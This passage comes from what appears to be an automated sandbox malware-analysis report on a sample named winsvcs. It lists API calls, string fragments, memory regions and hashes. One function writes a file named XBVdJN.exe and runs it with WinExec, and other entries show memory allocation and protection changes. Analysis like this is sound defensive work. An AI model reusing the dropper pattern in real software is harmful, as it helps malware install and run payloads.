LineTo.GDI32(0044A654,?,0044A658), ref: 0040CF8E
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF99
LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040CFA5
GetDC.USER32(0044A660), ref: 0040D018
CreateFontIndirectA.GDI32(0044B0E8), ref: 0040D03A
SelectObject.GDI32(0044A655,00000000), ref: 0040D044
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D050
SetTextColor.GDI32(0044A655,?), ref: 0040D05E
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D0A6
GetClientRect.USER32(0044A660,?), ref: 0040D0B7
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D0DD
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D0E8
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D15C
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D175
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D186
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D199
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1A4
LineTo.GDI32(0044A654,?,00000770), ref: 0040D1B3
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1BE
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D1CA
GetDC.USER32(0044A660), ref: 0040D23D
CreateFontIndirectA.GDI32(0044B128), ref: 0040D25F
SelectObject.GDI32(0044A655,00000000), ref: 0040D269
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D275
SetTextColor.GDI32(0044A655,?), ref: 0040D283
GetDC.USER32(0044A660), ref: 0040D303
CreateFontIndirectA.GDI32(0044B168), ref: 0040D325
SelectObject.GDI32(0044A655,00000000), ref: 0040D32F
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D33B
SetTextColor.GDI32(0044A655,?), ref: 0040D349
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D3BD
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D3D6
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D3E7
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D3FA
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D405
LineTo.GDI32(0044A654,?,00000770), ref: 0040D414
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D41F
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D42B
CreateSolidBrush.GDI32(0014C8C8), ref: 0040D469
LoadCursorA.USER32(00000000,00007F02), ref: 0040D47D
LoadIconA.USER32(00000000,00007F02), ref: 0040D491
GetModuleHandleA.KERNEL32(00000000), ref: 0040D4AE
LoadIconA.USER32(00000000), ref: 0040D4BD
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D4FF
GetClientRect.USER32(00000000,?), ref: 0040D510
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D537
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D560
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D56D
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D57C
GetModuleHandleA.KERNEL32(00000000), ref: 0040D584
LoadBitmapA.USER32(00000000), ref: 0040D596
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D5AE
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D5C6
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D68B
GetClientRect.USER32(0044A660,?), ref: 0040D69C
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D6C2
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D6CD
GetDC.USER32(0044A660), ref: 0040D740
CreateFontIndirectA.GDI32(0044B1A8), ref: 0040D762
SelectObject.GDI32(0044A655,00000000), ref: 0040D76C
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D778
SetTextColor.GDI32(0044A655,?), ref: 0040D786
CreateSolidBrush.GDI32(0014C8C8), ref: 0040D80D
LoadCursorA.USER32(00000000,00007F02), ref: 0040D821
LoadIconA.USER32(00000000,00007F02), ref: 0040D835
GetModuleHandleA.KERNEL32(00000000), ref: 0040D852
LoadIconA.USER32(00000000), ref: 0040D861
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D8A3
GetClientRect.USER32(00000000,?), ref: 0040D8B4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D8DB
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D904
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D911
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D920
GetModuleHandleA.KERNEL32(00000000), ref: 0040D928
LoadBitmapA.USER32(00000000), ref: 0040D93A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D952
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D96A
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D9BD
GetClientRect.USER32(0044A660,?), ref: 0040D9CE
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D9F4
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D9FF
GetDC.USER32(0044A660), ref: 0040DA72
CreateFontIndirectA.GDI32(0044B1E8), ref: 0040DA94
SelectObject.GDI32(0044A655,00000000), ref: 0040DA9E
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040DAAA
SetTextColor.GDI32(0044A655,?), ref: 0040DAB8
CreateSolidBrush.GDI32(0014C8C8), ref: 0040DB03
LoadCursorA.USER32(00000000,00007F02), ref: 0040DB17
LoadIconA.USER32(00000000,00007F02), ref: 0040DB2B
GetModuleHandleA.KERNEL32(00000000), ref: 0040DB48
LoadIconA.USER32(00000000), ref: 0040DB57
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DB99
GetClientRect.USER32(00000000,?), ref: 0040DBAA
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DBD1
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DBFA
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DC07
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DC16
GetModuleHandleA.KERNEL32(00000000), ref: 0040DC1E
LoadBitmapA.USER32(00000000), ref: 0040DC30
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DC48
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DC60
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040DCE6
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040DCFF
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040DD10
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040DD23
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD2E
LineTo.GDI32(0044A654,?,00000770), ref: 0040DD3D
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD48
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040DD54
GetDlgItem.USER32(0044A660,0000007B), ref: 0040DD90
GetClientRect.USER32(0044A660,?), ref: 0040DDA1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040DDC7
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040DDD2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040DE1D
LoadCursorA.USER32(00000000,00007F02), ref: 0040DE31
LoadIconA.USER32(00000000,00007F02), ref: 0040DE45
GetModuleHandleA.KERNEL32(00000000), ref: 0040DE62
LoadIconA.USER32(00000000), ref: 0040DE71
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DEB3
GetClientRect.USER32(00000000,?), ref: 0040DEC4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DEEB
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DF14
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DF21
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DF30
GetModuleHandleA.KERNEL32(00000000), ref: 0040DF38
LoadBitmapA.USER32(00000000), ref: 0040DF4A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DF62
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DF7A
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E00E
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E021
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E02C
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E038
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E049
LineTo.GDI32(0044A654,?,?), ref: 0040E05E
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E06F
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E082
CreateSolidBrush.GDI32(0014C8C8), ref: 0040E0C0
LoadCursorA.USER32(00000000,00007F02), ref: 0040E0D4
LoadIconA.USER32(00000000,00007F02), ref: 0040E0E8
GetModuleHandleA.KERNEL32(00000000), ref: 0040E105
LoadIconA.USER32(00000000), ref: 0040E114
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E156
GetClientRect.USER32(00000000,?), ref: 0040E167
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E18E
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E1B7
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E1C4
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E1D3
GetModuleHandleA.KERNEL32(00000000), ref: 0040E1DB
LoadBitmapA.USER32(00000000), ref: 0040E1F4
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E20C
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E224
GetDC.USER32(0044A660), ref: 0040E297
CreateFontIndirectA.GDI32(0044B228), ref: 0040E2B9
SelectObject.GDI32(0044A655,00000000), ref: 0040E2C3
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E2CF
SetTextColor.GDI32(0044A655,?), ref: 0040E2DD
GetDlgItem.USER32(0044A660,0000007B), ref: 0040E352
GetClientRect.USER32(0044A660,?), ref: 0040E363
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E389
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E394
GetDC.USER32(0044A660), ref: 0040E41B
CreateFontIndirectA.GDI32(0044B268), ref: 0040E43D
SelectObject.GDI32(0044A655,00000000), ref: 0040E447
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E453
SetTextColor.GDI32(0044A655,?), ref: 0040E461
GetDlgItem.USER32(0044A660,0000007B), ref: 0040E4F1
GetClientRect.USER32(0044A660,?), ref: 0040E502
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E528
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E533
CreateSolidBrush.GDI32(0014C8C8), ref: 0040E5B2
LoadCursorA.USER32(00000000,00007F02), ref: 0040E5C6
LoadIconA.USER32(00000000,00007F02), ref: 0040E5DA
GetModuleHandleA.KERNEL32(00000000), ref: 0040E5F7
LoadIconA.USER32(00000000), ref: 0040E606
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E646
GetClientRect.USER32(00000000,?), ref: 0040E657
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E67E
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E6A7
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E6B4
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E6C3
GetModuleHandleA.KERNEL32(00000000), ref: 0040E6CB
LoadBitmapA.USER32(00000000,?), ref: 0040E6D3
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E6EB
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E703
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E778
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E78B
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E796
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E7A2
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7B3
LineTo.GDI32(0044A654,?,?), ref: 0040E7C8
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7D9
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E7EC
SHGetMalloc.SHELL32(?), ref: 0040E817
SHGetDesktopFolder.SHELL32(?), ref: 0040E8D4
SendMessageA.USER32(0044A660,0000001F,00000000,00000000), ref: 0040EB38
SetTimer.USER32(00000000,?,?,004225B0), ref: 0040EB65
TrackPopupMenuEx.USER32(?,0044A650,00000008,?,0044A660,?), ref: 0040EB8C
KillTimer.USER32(00000000,00000000), ref: 0040EB99
BeginPaint.USER32(0044A660,?), ref: 0040EBAE
IsRectEmpty.USER32(?), ref: 0040EBBC
GetSystemTime.KERNEL32(?), ref: 0040EBCE
SetTimer.USER32(0044A660,00000001,?,004225B0), ref: 0040EBEC
EndPaint.USER32(0044A660,?), ref: 0040EBF4
GetClientRect.USER32(0044A660,?), ref: 0040EC12
CreateCompatibleDC.GDI32(00000000), ref: 0040EC28
SelectObject.GDI32(00000000,00000000), ref: 0040EC3B
GetObjectA.GDI32(00000000,00000018,?), ref: 0040EC57
GetClientRect.USER32(0044A660,?), ref: 0040EC6E
StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00000001,00000001,00CC0020), ref: 0040ECB9
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 0040ECE2
SelectObject.GDI32(00000000,00000000), ref: 0040ECEA
DeleteDC.GDI32(00000000), ref: 0040ECF1
GetCursorInfo.USER32(?), ref: 0040ED25
GetCursorPos.USER32(?), ref: 0040ED53
WindowFromPoint.USER32(?,?), ref: 0040ED67
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040ED74
GetCurrentThreadId.KERNEL32 ref: 0040ED7C
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0040ED8C
GetCursor.USER32 ref: 0040ED96
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0040EDA2
GetCursor.USER32 ref: 0040EDAC
StrRetToStrA.SHLWAPI(?,00000000,?), ref: 0040EDE5
_printf.LIBCMT ref: 0040EDFB
GetDC.USER32(00000000), ref: 0040EE12
EnumFontFamiliesA.GDI32(00000000,00000000,?,00000000), ref: 0040EE24
GetActiveWindow.USER32 ref: 0040EE2A
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040EF28
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040EF38
GetModuleHandleA.KERNEL32(00000000), ref: 0040EF40
LoadIconA.USER32(00000000,0043ABC0), ref: 0040EF4C
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040EF5B
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F048
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F058
GetModuleHandleA.KERNEL32(00000000), ref: 0040F060
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F06C
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F07B
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F120
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F130
GetModuleHandleA.KERNEL32(00000000), ref: 0040F138
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F144
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F153

Strings

<, xrefs: 0040C3EF
<, xrefs: 0040BFDC
<, xrefs: 0040CFE8
<, xrefs: 0040CCED
<, xrefs: 0040C955
<, xrefs: 0040D2D3
<, xrefs: 0040D710
<, xrefs: 0040E3EB
<, xrefs: 0040DA42
<, xrefs: 0040CA99
<, xrefs: 0040B5EC
<, xrefs: 0040D20D
<, xrefs: 0040C30F
<, xrefs: 0040BA4C
<, xrefs: 0040E267

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Load$Create$Move$Window$Line$Rect$MessageSend$HandleIconModule$Client$BitmapImage$Object$Select$CursorFont$ColorIndirectText$BrushInvalidateItemSolid$Thread$Timer$AttachInputPaint$ActiveBeginCompatibleCurrentDeleteDesktopEmptyEnumFamiliesFolderFromInfoKillMallocMenuPointPopupProcessStretchSystemTimeTrack_printf
String ID: <$<$<$<$<$<$<$<$<$<$<$<$<$<$<
API String ID: 1152109118-461452962
Opcode ID: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
Instruction ID: a9c2557e841c6cb4aed079c13c2012efc5e0e09a695cb913e2437938431cc45a
Opcode Fuzzy Hash: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
Instruction Fuzzy Hash: 1773C070548340AFE3348F60DC89FEB77B9FF99305F045929FA4992290D7B86845CB6A

Function 00479044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00479223
WriteFile.KERNELBASE(00000000,FFFADB8B,00003E00,?,00000000), ref: 00479252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00479256
WinExec.KERNEL32(?,00000005), ref: 00479262

Strings

athA, xrefs: 00479199
odul, xrefs: 0047922D
Clos, xrefs: 00479129
GetM, xrefs: 004790B6
Kern, xrefs: 004790F4
GetT, xrefs: 00479188
WinE, xrefs: 00479110
.dll, xrefs: 00479102
lstr, xrefs: 004791A7
el32, xrefs: 004790FB
XBVdJN.exe, xrefs: 004791FD, 00479200
catA, xrefs: 004791AF
dleA, xrefs: 004790D0
Writ, xrefs: 00479148
Crea, xrefs: 00479169

Memory Dump Source

Source File: 00000009.00000002.2607456736.0000000000479000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00479000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_479000_winsvcs.jbxd

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XBVdJN.exe$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-4190719182
Opcode ID: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
Instruction ID: 58ba0b43668d7517482e7b7aa96e86c75ac4398e6d64cdf10e80ef0de2497ba1
Opcode Fuzzy Hash: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
Instruction Fuzzy Hash: 89611774D002169BDF24CF94C888AEEB7B5FB44315F64C2ABD409AB701C7789E91CB99

Function 0040FCC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePen.GDI32(00000000), ref: 0040FD85
CreateFontIndirectA.GDI32(00000028), ref: 0040FDF4
GetSysColor.USER32(00000005), ref: 0040FE0C

Strings

dD, xrefs: 0040FE36
Taho, xrefs: 0040FDE8

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Create$ColorFontIndirect
String ID: Taho$dD
API String ID: 4251253423-4141250355
Opcode ID: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
Instruction ID: fcce034208925bc6aaa437948b4944f0ceb75c6593572307ad6557a4650ec99a
Opcode Fuzzy Hash: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
Instruction Fuzzy Hash: 1641C3B08053489FDB24CF1AC98478ABBE4FB49314F60866EE95C8B351C3758946CF95

Function 00429B0C Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00429B21

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
Instruction ID: 1759a15e84957c5be0338275ad0a4f9db10762a5021981fbe78d74647f587313
Opcode Fuzzy Hash: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
Instruction Fuzzy Hash: 08D05E7AA903456AEB009F76BC08B263BDCE385795F048436F80CC6190E674D9409E48

Function 02203894 Relevance: 1.5, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 022038B7

Memory Dump Source

Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
Instruction ID: d43e4f0160e33e4b86f6d923a457dd7dc1ac031816dfab441df1ea1bb82745ff
Opcode Fuzzy Hash: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
Instruction Fuzzy Hash: 8CE07E7590020CAFCF01DF94D94589DBBB5FB08200F008199ED54A6351D6319A20EF51

Function 02203904 Relevance: 1.5, APIs: 1, Instructions: 15
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0220391E

Memory Dump Source

Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
Instruction ID: 9f716a816eb73af6f75569a39d58e3a4324907b908df6543db8dc9be5095fb09
Opcode Fuzzy Hash: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
Instruction Fuzzy Hash: 16D04274D0020CAF8B00EFA9D54589CFBF5EB08200F1081AAEC04A7351E631AA50DF91

Function 0040FC5D Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 0040FC62

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
Instruction ID: f450d144a2216a65e4146170c8b5550937e7e802fcbd3a1ddd5c57f0d0063f53
Opcode Fuzzy Hash: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
Instruction Fuzzy Hash: A6D05E786843029FE714DF20EC84FA633A8EB1A704F46053DE884D72A0D7789501CB5E

Function 02200570 Relevance: 1.3, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02200593

Memory Dump Source

Source File: 00000009.00000002.2608158110.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2200000_winsvcs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: 31afe5c2ec40e16a428bfd0609d4d6a05857422145c1c605fd8e59f60a5b2bed
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: ABE07E7590020CAFCF01DFD8D9459ADBBB5EB08310F0080AAED14A6251D7719A20AF91

Function 02203854 Relevance: 1.3, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02203877

Memory Dump Source

Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: 227d88f9d11fadec220c5ee2c0780b9aba4d5e82cdc44c438c03c39a7dad0d65
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: 72E07E7590020CAFCF01DF94D94589DBBB5EB08210F00809AED14A6351D6319A20EF51

Function 02200540 Relevance: 1.3, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 02200560

Memory Dump Source

Source File: 00000009.00000002.2608158110.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2200000_winsvcs.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: 3d1dd792a9182b67d1d1cdf1754d2caf6b0cb00006fd32beab8bad51989196ba
Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: 69E09275D0020CEF8B00DFD8C8459ADBBB5EB08310F0080A9EC1497311D6319A60DF91

Function 02203824 Relevance: 1.3, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 02203844

Memory Dump Source

Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: 743ceb44ab787b50df68d46036b0b39ec8751a27463f1bf219fa1bd1a80e086b
